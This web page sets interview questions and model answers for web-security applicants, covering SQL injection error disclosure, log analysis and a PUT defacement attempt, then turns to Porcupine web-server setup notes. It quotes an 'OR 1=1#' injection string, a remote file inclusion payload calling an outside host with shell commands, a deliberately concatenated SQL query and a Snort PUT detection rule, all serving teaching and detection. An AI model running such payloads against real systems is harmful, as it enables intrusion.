soloscript.com

Web Server Application 2
 You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:

   
 What are some examples of how you would attempt to gain access?

Determine whether the applicant has a wide knowledge of different authentication vulnerabilities. They may try default usernames/passwords or SQL injection strings that produce an always-true SQL condition (such as OR 1=1#). If they provide SQL examples, show them the following error document and ask them what it indicates.
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
This error message indicates that the target web application is running Microsoft SQL, and it discloses directory structures.
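The coding pattern behind that error document, beside its hardened form, as an added example that is not part of the original page. It uses Python's sqlite3 as a stand-in for the ColdFusion and SQL Server stack; the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the table named in the error message."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE QuickJump_Items (ItemId INTEGER, QuickJumpId INTEGER)")
    db.executemany("INSERT INTO QuickJump_Items VALUES (?, ?)",
                   [(1, 10), (2, 10), (3, 20)])
    return db

# Query text taken from the error document; the value is appended at the end.
BASE = ("SELECT QuickJump_Items.ItemId FROM QuickJump_Items "
        "WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId = ")

def lookup_concatenated(db, quick_jump_id):
    """Weak pattern: the request value is pasted into the SQL text."""
    try:
        return [r[0] for r in db.execute(BASE + quick_jump_id)]
    except sqlite3.Error as exc:
        # Echoing driver text to the client is what exposed the query,
        # data source name and template path in the error document.
        return "DB error: %s | SQL = %s" % (exc, BASE + quick_jump_id)

def lookup_parameterized(db, quick_jump_id):
    """Hardened pattern: typed input, bound parameter, generic error text."""
    try:
        value = int(quick_jump_id)
    except (TypeError, ValueError):
        return "Invalid request"            # nothing about the backend leaks
    try:
        return [r[0] for r in db.execute(BASE + "?", (value,))]
    except sqlite3.Error:
        return "Request could not be processed"
```

An empty parameter reproduces the truncated `QuickJumpId =` query from the error document in the first function, while the second rejects it before any SQL is built.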

 
 What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20a"
at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
The goal of this question is to verify that the applicant can interpret various web log files and identify attacks and their possible impact. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the request. This attack was not successful for the following two reasons:
  * The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
  * The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
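The reading of that audit_log entry can be automated. The following is an added example, not part of the original page: it parses the entry quoted above (some request headers omitted) and extracts the facts the answer relies on. The function names and the returned field names are assumptions made for illustration.

```python
import re

# The audit_log entry quoted above (some request headers omitted).
ENTRY = r"""POST /index.php HTTP/1.1
Host: www.foo.com
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20a"
at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a"""

HEADER = re.compile(r"^([A-Za-z][\w-]*):\s*(.*)$")

def parse_entry(text):
    """Split an entry into headers (wrapped lines rejoined) and the logged body."""
    lines = text.splitlines()
    headers, body, last = {}, "", None
    for i, line in enumerate(lines[1:], start=1):
        m = HEADER.match(line)
        if m:
            last = m.group(1).lower()
            headers[last] = m.group(2)
        elif line.strip().isdigit():      # payload length marker, body follows
            body = "\n".join(lines[i + 1:])
            break
        elif last:                        # continuation of a wrapped header
            headers[last] += " " + line.strip()
    return {"request": lines[0], "headers": headers, "body": body}

def triage(entry):
    """Pull out who logged it, whether it was blocked, and what was sent."""
    h = entry["headers"]
    msg = h.get("mod_security-message", "")
    params = dict(p.partition("=")[::2] for p in entry["body"].split("&") if p)
    rule = re.search(r'Pattern match "([^"]*)"', msg)
    # "cmd" is the parameter name used in the payload shown on this page.
    commands = [c.strip() for c in params.get("cmd", "").split(";") if c.strip()]
    return {
        "logged_by_mod_security": any(k.startswith("mod_security-") for k in h),
        "blocked": h.get("mod_security-action") == "403",
        "matched_pattern": rule.group(1) if rule else None,
        "remote_include_params": [k for k, v in params.items()
                                  if re.match(r"(?i)(https?|ftp)://", v)],
        "programs": [c.split()[0] for c in commands],
        "body_complete": int(h.get("content-length", -1)) == len(entry["body"]),
    }
```

The `programs` field lists `lsuname` as a single program name, which is the typo the second bullet describes.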

 
 One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.html HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

 
 What does this log entry indicate? How could you identify what the contents are of the "hacked.html" file that the attacker is trying to upload?

The goal of this question is to determine whether the applicant can identify both the attack (a web defacement attempt using the HTTP PUT method) and the logging limitations of CLF (Common Log Format). In this type of attack, the defacement text is sent in the request body and not on the URL request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
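On the log side, the same activity can be triaged from the access log alone. The following is an added example, not part of the original page: it scans access-log lines for write-method requests and separates denied attempts from accepted ones, since only the status code (never the uploaded body) is available in CLF. The sample lines other than the first are constructed, and the function names and method list are assumptions.

```python
import re
from collections import defaultdict

# Closing quote after the protocol is optional so damaged lines still parse.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)"? '
    r'(?P<status>\d{3}) (?P<size>\S+)(?P<rest>.*)$')

WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}

# First line follows the entry quoted above; the rest are constructed samples.
SAMPLE = [
    '201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.html HTTP/1.0" '
    '403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"',
    '201.1.199.155 - - [26/Dec/2004:01:55:49 -0500] "PUT /index.html HTTP/1.0" '
    '403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"',
    '192.0.2.10 - - [26/Dec/2004:02:10:03 -0500] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [26/Dec/2004:02:14:30 -0500] "PUT /uploads/test.html HTTP/1.1" '
    '201 0 "-" "-"',
]

def write_attempts(lines):
    """Group write-method requests per client into denied and accepted."""
    report = defaultdict(lambda: {"denied": [], "accepted": []})
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] not in WRITE_METHODS:
            continue
        bucket = "accepted" if m["status"].startswith("2") else "denied"
        report[m["ip"]][bucket].append((m["method"], m["path"], int(m["status"])))
    return dict(report)

def needs_response(report):
    """Clients whose write was accepted: content on disk may have changed."""
    return sorted(ip for ip, r in report.items() if r["accepted"])

if __name__ == "__main__":
    rep = write_attempts(SAMPLE)
    for ip, r in rep.items():
        print(ip, "denied:", len(r["denied"]), "accepted:", len(r["accepted"]))
    print("investigate:", needs_response(rep))
```

A 403 on every PUT, as in the entry above, means the uploads were refused; any 2xx result is the case that calls for checking the file on disk or a packet capture.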

 
 What is WSDL?

WSDL is an XML format for describing network services as a set of endpoints operating on messages containing either document-oriented or procedure-oriented information. The operations and messages are described abstractly, and then bound to a concrete network protocol and message format to define an endpoint. Related concrete endpoints are combined into abstract endpoints (services).
(Source: www.w3.org).

 
 What is Porcupine?
Porcupine is a web application server that provides an object oriented framework for developing web applications rapidly.
Many of the tasks required for building web applications as you know them, are either eliminated or simplified. For instance, when developing a Porcupine application you don't have to design a relational database. You only have to design and implement your business objects as classes, using the building blocks provided by the framework (datatypes). Porcupine integrates a native object database, no mapping required.
Generally, every Porcupine application consists of three distinct layers. The first is the business layer consisting of the business objects which encapsulate the business logic. The second layer binds the HTTP protocol with the first layer's business objects. This layer is implemented using Python Server Pages or Servlets. If using XML-RPC, one common approach is to directly map an XML-RPC method to a business object's method. The third layer, the presentation layer, usually consists of XML UI definitions and JavaScript event handlers. The first two layers are executed server side and the third layer is executed on the client (browser).
 
 How do you set up the Porcupine web connectors?

The "porcupine.exe" file of the CGI connector and the "porcupine.py" file of the MOD_PYTHON connector need to be located in the web server's document root folder, and not in a subfolder like "cgi-bin" or "porcupine".
We will remove this limitation in future releases.
If you are using the CGI connector this requires some extra actions in order for the web server to execute "porcupine.exe".
On IIS:
Open the IIS administration console. Open the "Default Web Site" properties.
On the "Home Directory" tab, locate the Execute Permissions setting and select "Scripts and Executables".
On Apache:
Open the Apache "httpd.conf" file. Locate the "ScriptAlias" directives. Add the following directive: ScriptAlias /porcupine.exe "[YOUR PATH TO porcupine.exe]"


  Copyright 2000-2006 © SoloScript.com, All rights reserved.